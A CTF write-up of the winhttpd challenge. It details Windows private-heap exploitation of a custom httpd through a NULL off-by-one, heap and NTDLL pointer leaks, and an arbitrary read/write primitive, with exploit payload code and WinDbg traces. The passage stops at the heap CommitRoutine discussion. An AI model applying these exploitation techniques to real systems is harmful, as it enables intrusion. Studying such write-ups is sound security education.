winhttpd writeup: private heaps pwning on Windows

Following last weekend’s Insomni’hack teaser, and by popular demand, here is a detailed write-up of my winhttpd challenge, which implemented a custom multi-threaded httpd and ran on the latest version of Windows 10:

This challenge is running on Windows Server 2019, Version 1809 (OS Build 17763.253).

Since multi-threaded servers have obvious isolation issues for a CTF challenge, you first had to connect to a dispatcher service, which would spawn an instance for you on a dedicated port that only your IP was allowed to access. You could then send as many requests to the httpd as you liked, as long as the instance didn’t crash and you kept the dispatcher socket open.

It all starts with a HeapCreate

The server limits the number of concurrent requests to 5, and each request runs in a dedicated thread, which creates a private heap with HeapCreate(0, 0, 0) and finally destroys it with HeapDestroy(hHeap) when the request terminates.
This means that every request has a clean heap and cannot interfere with other requests’ heaps (yet), making it far easier to have deterministic allocations since you don’t have to worry about whatever occurs on the main heap or in other threads. On the other hand, you lose whatever pointers you could have leaked from the main heap.
Private heaps have their own LFH and thus we also start with no LFH enabled, so we can avoid the LFH randomization altogether as long as we don’t create too many objects of the same size.

After opening several threads we can observe that we get the following heaps:

0:006> !heap
Index   Address  Name      Debugging options enabled
  1:   17ccd2c0000                
  2:   17ccd0b0000                
  3:   17ccd220000                
  4:   17ccd4e0000                
  5:   17ccd260000                
  6:   17ccd6d0000                
  7:   17ccd460000                
  8:   17ccd590000

As you can see:

  • unlike mmap on (non-grsec) Linux, all heaps are mapped at random offsets; therefore leaking a heap address doesn’t mean we can immediately leak other heaps or libraries
  • all new heaps are aligned on 0x10000; that could come in handy for partial overwrites, however I didn’t actually use it in my exploit 😛

The bugs

The httpd itself doesn’t do much: you can only read local files (without traversal) or log in. The login takes username/password/domain parameters, and just greets you if the credentials are valid, or fails. The domain parameter has to be either empty or start with “win.local”. This prefix-only check is the first bug, since you can send ““. This will cause the httpd to open a socket on port 12345 to your domain, send “<username>::<password>” on that socket, and wait for the authentication response.
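
A minimal Python sketch of why a prefix-only check is not enough. The function name `domain_allowed` and the attacker hostname are hypothetical; only the "empty or starts with win.local" rule comes from the description above.

```python
def domain_allowed(domain: str) -> bool:
    """Model of the described check: empty, or starting with "win.local"."""
    return domain == "" or domain.startswith("win.local")


# Hypothetical attacker-controlled name that still carries the expected prefix.
attacker_domain = "win.local.attacker.example"

print(domain_allowed("win.local"))         # the intended domain
print(domain_allowed(attacker_domain))     # accepted too: only the prefix is checked
print(domain_allowed("attacker.example"))  # rejected: wrong prefix
```

Any hostname the attacker can resolve to their own machine and that begins with the expected prefix passes such a check, which is what gives us the “domain” socket used for the leaks later on.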

The other bug lies in the custom strcpy_n function that is used to store various variables in the following http_request struct (which is also stored on the heap shortly after the thread creation):

typedef struct {
    char *key;
    char *value;
} dictionary_entry, *dictionary;

typedef struct {
    SOCKET sockfd;
    HANDLE heap;
    char method[16];
    char filename[256];
    char *query_string;
    char protocol[16];
    char hostname[128];
    dictionary headers;
    size_t headers_count;
    dictionary params; /* GET & POST params */
    size_t params_count;
    char *content; /* POST content */
    size_t content_length;
} http_request;

That function has a NULL off-by-one bug, and is called in the following contexts:

strcpy_n(req->method, cursor, sizeof(req->method));

⇨ overflows filename[0], useless (also the method is invalid so request aborts)

strcpy_n(req->filename, cursor, sizeof(req->filename));

⇨ overflows the first byte of query_string, which could be nice, but query_string isn’t allocated yet (NULL)

req->query_string = (char*)HeapAlloc(req->heap, 0, ptr - cursor + 1);
strcpy_n(req->query_string, cursor, ptr - cursor);

⇨ no overflow

strcpy_n(req->protocol, cursor, sizeof(req->protocol));

⇨ overflows hostname[0], useless

if (!_stricmp(key, "Host") && !*req->hostname) {
    strcpy_n(req->hostname, value, sizeof(req->hostname));

⇨ overflows the headers pointer (pointer to a dictionary, which is an array of key-value pointers)
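
The effect of that last call can be modelled in Python with ctypes. This is only a sketch: the source of strcpy_n is not shown here, so the model assumes it copies at most n bytes and then writes the terminating NUL right after them; the struct assumes 8-byte SOCKET, HANDLE, pointer and size_t fields (x64), and the headers value is taken from the WinDbg trace further down.

```python
import ctypes


class HttpRequest(ctypes.LittleEndianStructure):
    # Mirror of the http_request struct, assuming a 64-bit layout.
    _fields_ = [
        ("sockfd", ctypes.c_uint64),
        ("heap", ctypes.c_uint64),
        ("method", ctypes.c_char * 16),
        ("filename", ctypes.c_char * 256),
        ("query_string", ctypes.c_uint64),
        ("protocol", ctypes.c_char * 16),
        ("hostname", ctypes.c_char * 128),
        ("headers", ctypes.c_uint64),
        ("headers_count", ctypes.c_uint64),
        ("params", ctypes.c_uint64),
        ("params_count", ctypes.c_uint64),
        ("content", ctypes.c_uint64),
        ("content_length", ctypes.c_uint64),
    ]


def strcpy_n(buf: bytearray, offset: int, src: bytes, n: int) -> None:
    """Assumed behaviour: copy at most n bytes, then write a NUL after them."""
    data = src[:n]
    buf[offset:offset + len(data)] = data
    buf[offset + len(data)] = 0  # lands one byte past the field when len(src) >= n


req = HttpRequest(headers=0x17CCD222E80)
raw = bytearray(bytes(req))
strcpy_n(raw, HttpRequest.hostname.offset, b"X" * 128, HttpRequest.hostname.size)
corrupted = HttpRequest.from_buffer_copy(bytes(raw))

print(hex(ctypes.sizeof(HttpRequest)), hex(corrupted.headers))
```

Under these assumptions the struct is 0x1e8 bytes, which matches the size of the http_request allocation in the traces, and the stray NUL clears the least significant byte of headers.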

Only the last one is interesting as it means we can make the headers dictionary – which I’ll refer to as headers** from now on – point to controlled memory.
During the parsing of HTTP headers, key-value pairs are added to the headers dictionary by a dict_add() function:

  • the program loops up to req->headers_count times to check if the same header name already exists
  • if it doesn’t, a new key and value are allocated with HeapAlloc()
    • then the dictionary gets extended with HeapReAlloc() and the new pair is appended to the dictionary
  • if it does, the key remains unchanged
    • if the new value’s length is <= strlen(prev_value), the previous bytes are just overwritten in place
    • if it is not, the value gets extended with HeapReAlloc()

So if headers** points to controlled memory, parsing the next headers could lead to an arbitrary write: we edit a valid key whose value pointer points wherever we want.
Headers are never printed by the application and thus can’t be used directly for an arbitrary read.
dict_add() is also used to add key-value pairs to the params** dictionary.
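
The “key already exists” branch is the one that turns a controlled dictionary into a write primitive. Below is a toy Python model of just that branch. The `Memory` class, the `dict_update` name, the exact-match key comparison and the trailing NUL written after the new value are all assumptions made for illustration; the real dict_add() may differ in those details.

```python
import struct


class Memory:
    """Tiny flat address space, just enough to model the in-place edit."""

    def __init__(self, size: int):
        self.data = bytearray(size)

    def write(self, addr: int, blob: bytes) -> None:
        self.data[addr:addr + len(blob)] = blob

    def qword(self, addr: int) -> int:
        return struct.unpack_from("<Q", self.data, addr)[0]

    def cstr(self, addr: int) -> bytes:
        end = self.data.index(0, addr)  # first NUL at or after addr
        return bytes(self.data[addr:end])


def dict_update(mem, dictionary, count, key, value) -> bool:
    """Model of the existing-key path: edit in place if the new value fits."""
    for i in range(count):
        key_ptr = mem.qword(dictionary + 16 * i)      # entry.key
        val_ptr = mem.qword(dictionary + 16 * i + 8)  # entry.value
        if mem.cstr(key_ptr) == key:
            if len(value) <= len(mem.cstr(val_ptr)):
                mem.write(val_ptr, value + b"\0")
                return True
            return False  # the real code would HeapReAlloc() the value here
    return False


mem = Memory(0x100)
mem.write(0x10, b"X\0")                          # a valid key string
mem.write(0x40, b"AAAAAAAA\0")                   # stand-in for the write target
mem.write(0x80, struct.pack("<QQ", 0x10, 0x40))  # fake entry: key -> target

ok = dict_update(mem, dictionary=0x80, count=1, key=b"X", value=b"BBBB")
print(ok, mem.cstr(0x40))
```

The model also shows the constraint that comes back later: the write only happens in place when the new value is no longer than the string currently stored at the target.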

The initial leak

Before we go further we need an initial leak to bypass ASLR.
If we manage to put headers** on top of a valid chunk, we can add a new header to cause a HeapReAlloc on that chunk without having to worry about messing up the allocator’s metadata (inlined or not): as far as the allocator is concerned, this is a valid request.
If the new size is more than that of the chunk we overlap with, the allocator will try to extend it. If there is enough free space adjacent to the chunk, that will be used and will just increase the size of our chunk, otherwise it’ll allocate new memory and free the old chunk, thereby allowing us to free the overlapped chunk.

Now there’s a catch: before headers** gets HeapReAlloc()’ed, dict_add checks if the header we’re adding already exists, and will therefore loop over all entries of headers**. Since our off-by-one bug gets triggered on a headers** that has at least one entry (the “Host” header itself), dict_add will always try to dereference a key pointer at least once, which is problematic since we haven’t bypassed ASLR yet.

The idea here is that we can use KUSER_SHARED_DATA, a section of memory that is always mapped at 0x7ffe0000 – as can be observed with !address in WinDbg.

0:007> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
+        0`00000000        0`7ffe0000        0`7ffe0000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe0000        0`7ffe1000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      Other      [User Shared Data]
+        0`7ffe1000        0`7ffe6000        0`00005000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe6000        0`7ffe7000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      <unknown>  [.........5......]
+        0`7ffe7000       bb`f1490000       bb`714a9000             MEM_FREE    PAGE_NOACCESS                      Free       
+       bb`f1490000       bb`f158a000        0`000fa000 MEM_PRIVATE MEM_RESERVE                                    Stack      [~0; 4f8.13c8]
0:007> dt nt!_KUSER_SHARED_DATA 0x7ffe0000
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
   +0x02e ImageNumberHigh  : 0x8664
   +0x030 NtSystemRoot     : [260]  "C:\WINDOWS" 
   +0x238 MaxStackTraceDepth : 0
   +0x23c CryptoExponent   : 0

That doesn’t contain any useful pointer for us on Windows 10, but it is perfect to survive a pointer dereference. So we just craft a fake header that points to the NtSystemRoot, which is "C\x00" (unicode string).
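
A quick way to convince yourself of this, sketched in Python: read as a C string, the UTF-16LE encoding of the NtSystemRoot value stops after its first character. The helper name `c_string_at` is made up for the example; the address and offset come from the WinDbg output above.

```python
import struct

KUSER_SHARED_DATA = 0x7FFE0000
NT_SYSTEM_ROOT_OFFSET = 0x30


def c_string_at(buf: bytes, offset: int = 0) -> bytes:
    """Return the NUL-terminated byte string starting at offset."""
    end = buf.index(b"\0", offset)
    return buf[offset:end]


# NtSystemRoot as it sits in memory: a UTF-16LE string plus its terminator.
nt_system_root = "C:\\WINDOWS".encode("utf-16-le") + b"\0\0"
fake_key = c_string_at(nt_system_root)

# Six pointers to that string: three fake (key, value) pairs, 0x30 bytes total.
fake_headers = struct.pack("<Q", KUSER_SHARED_DATA + NT_SYSTEM_ROOT_OFFSET) * 6

print(fake_key, hex(len(fake_headers)))
```

Every fake key therefore compares as the one-character string "C", which never matches a real header name we send, so the lookup loop simply walks past the fake entries without crashing.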

The GET parameters stored in params** have a urldecoded value, which allows us to store NULL bytes in the value. Furthermore, the username and password params can be leaked over the “domain” socket, so we can craft our fake headers** in one of these and free the value. The allocator will insert a FreeList entry (Flink + Blink) inside the free chunk, so printing the value will leak the Flink and thus the position of the heap!

Let’s see how it works. First we register a few breakpoints to pretty-print our allocations:

bp ntdll!RtlAllocateHeap "r @$t1 = @rcx ; r @$t2 = @edx ; r @$t3 = @r8; g"
bp ntdll!RtlReAllocateHeap "r @$t4 = @rcx ; r @$t5 = @edx ; r @$t6 = @r8; r $t7 = @r9 ; g"
bp winhttpd+24C5 ".printf \"----------------------------------------------------------------------------------------------------\\nNew Heap @ %#p\\n\", @rax ; g"
bp winhttpd+24DD ".printf \"req_head          : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2508 ".printf \"http_request      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2732 ".printf \"req->content      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+213A ".printf \"req->query_string : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+36DE ".printf \"    dict_add new key       :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+3715 ".printf \"    dict_add new value     :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+374C ".printf \"    dict_add realloc value : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37FF ".printf \"    dict_add realloc dict  : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37D0 ".printf \"    dict_add new dict      :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+1D20 ".printf \"Parsing params...\\n\" ; g"
bp winhttpd+22C8 ".printf \"Parsing header...\\n\" ; g"

This is the payload I used:

fake_headers = p64(_KUSER_SHARED_DATA + 0x30) * 6

payload = "POST "
payload += "/login?" + "A" * 0x100 + "&username=" + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "X: " + "Y" * 0x30 + "\r\n"             # [2]
payload += "X: " + "Y" * 0x50 + "\r\n"             # [3]
payload += "A" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [4]
payload += "Host: " + 'X' * 128 + "\r\n"           # [5] trigger off-by-one on headers**
payload += "Z" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [6] HeapReAlloc(headers**) => HeapFree(params[username].value)
payload += "\r\n"

Allocations observed in WinDbg:

0:003> g
New Heap @ 0x17ccd220000
req_head          : HeapAlloc(0x17ccd220000, 0, 0x2000) -> 0x17ccd220860
http_request      : HeapAlloc(0x17ccd220000, 0, 0x1e8) -> 0x17ccd222870
req->query_string : HeapAlloc(0x17ccd220000, 0, 0x1c9) -> 0x17ccd222a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x7) -> 0x17ccd222c40
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x17) -> 0x17ccd222c60
    dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222c80
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222ca0
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x101) -> 0x17ccd222cc0
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222c80, 0x20) -> 0x17ccd222dd0
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222c80
[1] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e00
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222dd0, 0x30) -> 0x17ccd222e40
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x2) -> 0x17ccd222dd0
[2] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e80
[2] dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222ec0
Parsing header...
[3] dict_add realloc value : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x51) -> 0x17ccd222ee0
Parsing header...
[4] dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f40
[4] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f90
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222ec0, 0x20) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x5) -> 0x17ccd222ec0
[5] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x81) -> 0x17ccd222fe0
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x30) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd223070
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd2230c0
[6] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e00, 0x40) -> 0x17ccd223110
0:006> dps 0x17ccd222e00 L6
0000017c`cd222e00  0000017c`cd223160 [6]
0000017c`cd222e08  0000017c`cd220150 [6]
0000017c`cd222e10  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e18  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e20  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e28  00000000`7ffe0030 SharedUserData+0x30

Step-by-step explanation:

  • At [1] we managed to get the username (params[2].value) aligned on 0x100.
  • At [2] we create a header value whose size is 0x30* ; the headers** size is now 0x10
  • At [3] we realloc that header’s value, leaving a free chunk of size 0x30 available
  • At [4] we create another header, the headers** size is now 0x20, we use a key and value that are larger than 0x30 to avoid consuming the free 0x30 chunk
  • At [5] we perform the off-by-one
    • first the “Host” header is added, the headers** size becomes 0x30, and thus it reuses the free 0x30 chunk
    • the headers** LSBs change from 2e80 to 2e00 because of the off-by-one ⇨ headers** == params[2].value
  • At [6] we add another header, which causes HeapReAlloc to free headers** and allocate headers** further in the heap
    • the allocator puts its Flink and Blink freelist pointers in params[2].value, which we will leak over our “domain socket”

Note*: 0x30 is not the real size: I forgot to account for the terminating NULL bytes and the metadata’s size in my calculations. It doesn’t matter; what matters is our plan 😉: an alloc of 0x41 doesn’t fit into a chunk allocated for 0x31.

Because at the end of the request handle_client calls HeapFree on all previously allocated pointers, we want to keep our “domain” socket open as long as possible to avoid a crash. That also avoids the HeapDestroy call which would destroy our heap before we can even use our leak.
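
Turning the bytes received on the “domain” socket into a heap base could look like the sketch below. It is not taken from the actual exploit: the helper names are hypothetical, and masking down to the 0x10000 alignment only works when the leaked Flink lies within the first 0x10000 bytes of the heap, which is the case in the trace above.

```python
import struct

HEAP_ALIGNMENT = 0x10000  # new heaps are aligned on 0x10000 (see the !heap output)


def parse_flink(leaked: bytes) -> int:
    """The value is sent as a C string, so the high NUL bytes are missing."""
    return struct.unpack("<Q", leaked[:8].ljust(8, b"\0"))[0]


def heap_base(flink: int) -> int:
    """Round the leaked pointer down to the heap alignment."""
    return flink & ~(HEAP_ALIGNMENT - 1)


# The six non-NUL bytes of the Flink seen at 0x17ccd222e00 in the dps output.
leak = bytes.fromhex("603122cd7c01")
flink = parse_flink(leak)

print(hex(flink), hex(heap_base(flink)))
```

If one of the low bytes of the Flink happened to be NUL the string would be cut short, which is one reason such a leak can occasionally fail.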

Leaking NTDLL

winhttpd doesn’t store any function pointer or pointer to its .data section. We’re in a clean heap, is there anything useful for us in there?

All pointers seem to point inside the current heap except this one:

0:006> dps 0x17ccd220000 L100
0000017c`cd2202b8  00000000`001fe000
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90
0000017c`cd2202c8  00000000`ffffffff

This is great because it means every heap gives us a pointer into NTDLL. Now we need a strategy to leak its value.
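
Once that pointer is read, the NTDLL base follows from a fixed offset. The sketch below derives the offset from the addresses printed in this write-up (the leaked pointer and the NTDLL base reported by the exploit log at the end), so it is only meaningful for this exact ntdll build; the constant and function names are made up for the example.

```python
# Values copied from the debugger output and the exploit log in this write-up.
HEAP_BASE = 0x17CCD220000
NTDLL_PTR_IN_HEAP = 0x17CCD2202C0   # address holding the ntdll pointer
LEAKED_POINTER = 0x7FF892B33D10     # ntdll!RtlpStaticDebugInfo+0x90
NTDLL_BASE = 0x7FF8929D0000         # as printed by the exploit

# Build-specific offsets (OS Build 17763.253 only).
PTR_OFFSET_IN_HEAP = NTDLL_PTR_IN_HEAP - HEAP_BASE
LEAK_OFFSET_IN_NTDLL = LEAKED_POINTER - NTDLL_BASE


def ntdll_base_from_leak(leak: int) -> int:
    """Subtract the build-specific offset of the leaked symbol."""
    return leak - LEAK_OFFSET_IN_NTDLL


print(hex(PTR_OFFSET_IN_HEAP), hex(LEAK_OFFSET_IN_NTDLL))
print(hex(ntdll_base_from_leak(LEAKED_POINTER)))
```

A cheap sanity check on the result is that an image base should be aligned on 0x10000.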

Arbitrary read/write

To obtain an arbitrary write primitive we can overwrite the pointers inside headers** and params**. params** is more interesting though, because we can also leak the values if the param key is either username or password.

Therefore we will want to overlap headers** and params** and once again cause a HeapReAlloc(headers**) to free the params** chunk.


content = "A=" + urlencode(flat(  # [8]
    username_heap_thread_1, ntdll_leak_addr,
    password_heap_thread_1, CommitRoutine_mangled_addr, # spoil for later :P
    password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&" + "&" * 0x100

payload  = "POST "
payload += '/login?a=AAAAAAAAAAAAAAAA&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n" # [2]
payload += "username: Y\r\n"             # [3]
payload += "X: Y\r\n"                    # [4]
payload += "Content-Length: " + str(len(content)) + "\r\n" # [5]
payload += "X: " + "Y" * 0x50 + "\r\n"   # [6]
payload += "\r\n"
payload += content                       # [7]

Allocations observed in WinDbg:

New Heap @ 0x17ccd260000
req_head          : HeapAlloc(0x17ccd260000, 0, 0x2000) -> 0x17ccd260860
http_request      : HeapAlloc(0x17ccd260000, 0, 0x1e8) -> 0x17ccd262870
req->query_string : HeapAlloc(0x17ccd260000, 0, 0x110) -> 0x17ccd262a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262b80
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x11) -> 0x17ccd262ba0
    dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262bc0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262be0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0xa1) -> 0x17ccd262c00
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262bc0, 0x20) -> 0x17ccd262cb0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262bc0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262ce0
[1] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262cb0, 0x30) -> 0x17ccd262d00
    dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262ce0, 0x11) -> 0x17ccd262cb0
Parsing header...
[2] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x5) -> 0x17ccd262ce0
[2] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x81) -> 0x17ccd262d40
[2] dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262dd0
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262df0
[3] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e10
[3] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x20) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e30
[4] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x30) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0xf) -> 0x17ccd262e70
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x4) -> 0x17ccd262e90
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd262eb0
Parsing header...
[6] dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262e50, 0x51) -> 0x17ccd262f00
[7] req->content      : HeapAlloc(0x17ccd260000, 0, 0x1b2) -> 0x17ccd262f60
Parsing params...
[8] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[8] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x31) -> 0x17ccd262d00
[8] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd263120
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0x80000a, 0x1ca8) -> 0x17ccd262d00
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x17) -> 0x17ccd262d20
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd263120, 0x50) -> 0x17ccd260750
0:006> da poi(0x17ccd260750)
0000017c`cd222c80  "username"
0:006> dps poi(0x17ccd260750+8) L1
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90

Step-by-step explanation:

    • At [1] we managed to get params** aligned with 0x100
    • At [2] we perform the off-by-one
      • first the “Host” header is added and reuses the old "BBBBBBBB" username, the headers** is created with a size of 0x10
      • the headers** LSBs change from 2dd0 to 2d00 because of the off-by-one ⇨ headers** == params**
    • At [3] we add a header, which is actually an old test that I forgot to remove 😜
      • the headers** size is now 0x20, which still fits in the original size of params** (0x30), so this neither frees nor moves it
    • At [4] we add another header with a small value
      • the headers** size is now 0x30, which still fits in the original size of params**
    • At [5] we add the Content-Length header, which is mandatory to send POST params
      • it makes sure there’s an allocated chunk after the value of [4]
      • the headers** size becomes 0x40,  which causes HeapReAlloc to free headers** and allocate it further in the heap
        • params** is now free
    • At [6] we edit the value of [4], causing a HeapReAlloc
      • since the chunk can’t be extended that much anymore, it frees it and moves it further in the heap
      • we now have a small chunk available for next step
    • At [7] the POST content is allocated, this doesn’t fit in free chunks and therefore gets allocated at the end of the heap
    • At [8] the first POST param is added to params**
      • all pointers in params** can be dereferenced, so the program doesn’t crash
      • the key reuses our previously freed small chunk
      • the value overlaps with the free params** itself so we now fully control the values inside params** ⇨ arbitrary read/write
      • params** gets reallocated, but keeps our crafted key-value pairs

Note that the arbitrary write is limited: we can only edit up to strlen(target) anywhere in memory.
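
The crafted entries and the strlen limit can be sketched without pwntools. The addresses below are the ones printed by the exploit log at the end of this post; `percent_encode`, `fake_dictionary` and `writable_length` are hypothetical helpers, not functions from the actual exploit.

```python
import struct


def percent_encode(data: bytes) -> str:
    """Encode every byte as %xx so NUL bytes survive the urldecode."""
    return "".join("%%%02x" % b for b in data)


def fake_dictionary(pairs) -> bytes:
    """Pack (key_ptr, value_ptr) pairs the way a dictionary stores them."""
    return b"".join(struct.pack("<QQ", key, value) for key, value in pairs)


def writable_length(current: bytes) -> int:
    """Bytes editable in place: up to the first NUL of the current content."""
    end = current.find(b"\0")
    return len(current) if end < 0 else end


USERNAME_KEY = 0x17CCD222C80         # 'username' string in heap 1
PASSWORD_KEY = 0x17CCD222CA0         # 'password' string in heap 1
NTDLL_PTR_ADDR = 0x17CCD2202C0       # where the ntdll pointer is stored
COMMIT_ROUTINE_ADDR = 0x17CCD220168  # heap 1 + 0x168

entries = fake_dictionary([
    (USERNAME_KEY, NTDLL_PTR_ADDR),
    (PASSWORD_KEY, COMMIT_ROUTINE_ADDR),
    (PASSWORD_KEY, COMMIT_ROUTINE_ADDR),
])
content = "A=" + percent_encode(entries)

print(hex(len(entries)), len(content))
print(writable_length(struct.pack("<Q", 0xF603AD6B90E97029)))  # mangled CommitRoutine
print(writable_length(struct.pack("<Q", 0x0000017CCD220120)))  # a heap pointer
```

The 0x30 bytes of entries plus the terminator match the 0x31-byte value allocated at [8]. A mangled pointer with no NUL byte can be replaced entirely, while a heap pointer only exposes its six low bytes.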

The heap CommitRoutine callback

With the NTDLL base leaked I have no doubt you can find interesting pointers. Many of them seem available but are mangled and without names, which isn’t very cool. You could also leak the TEB and thus other libraries too, unlocking more targets.

On the other hand, out of curiosity, I wanted to see what the heap structure looks like. The lame way to find its name (which I used of course) was to google “heap structure windows”, which returns this paper as the first result, and then try several of the mentioned structures until one seems legit. Here nt!_HEAP looked ok 🙂

0:006>dt nt!_HEAP 0x17ccd220000
   +0x000 Segment          : _HEAP_SEGMENT
   +0x000 Entry            : _HEAP_ENTRY
   +0x010 SegmentSignature : 0xffeeffee
   +0x014 SegmentFlags     : 2
   +0x018 SegmentListEntry : _LIST_ENTRY [ 0x0000017c`cd220120 - 0x0000017c`cd220120 ]
   +0x028 Heap             : 0x0000017c`cd220000 _HEAP
   +0x030 BaseAddress      : 0x0000017c`cd220000 Void
   +0x038 NumberOfPages    : 0xf
   +0x150 FreeLists        : _LIST_ENTRY [ 0x0000017c`cd222e00 - 0x0000017c`cd223160 ]
   +0x160 LockVariable     : 0x0000017c`cd2202c0 _HEAP_LOCK
   +0x168 CommitRoutine    : 0xf603ad6b`90e97029     long  +f603ad6b90e97029
   +0x170 StackTraceInitVar : _RTL_RUN_ONCE
   +0x178 CommitLimitData  : _RTL_HEAP_MEMORY_LIMIT_DATA
   +0x198 FrontEndHeap     : (null) 
   +0x1a0 FrontHeapLockCount : 0
   +0x1a2 FrontEndHeapType : 0 ''
   +0x1a3 RequestedFrontEndHeapType : 0 ''
   +0x1a8 FrontEndHeapUsageData : 0x0000017c`cd220750  ""
   +0x1b0 FrontEndHeapMaximumIndex : 0x80
   +0x1b2 FrontEndHeapStatusBitmap : [129]  ""
   +0x238 Counters         : _HEAP_COUNTERS
   +0x2b0 TuningParameters : _HEAP_TUNING_PARAMETERS

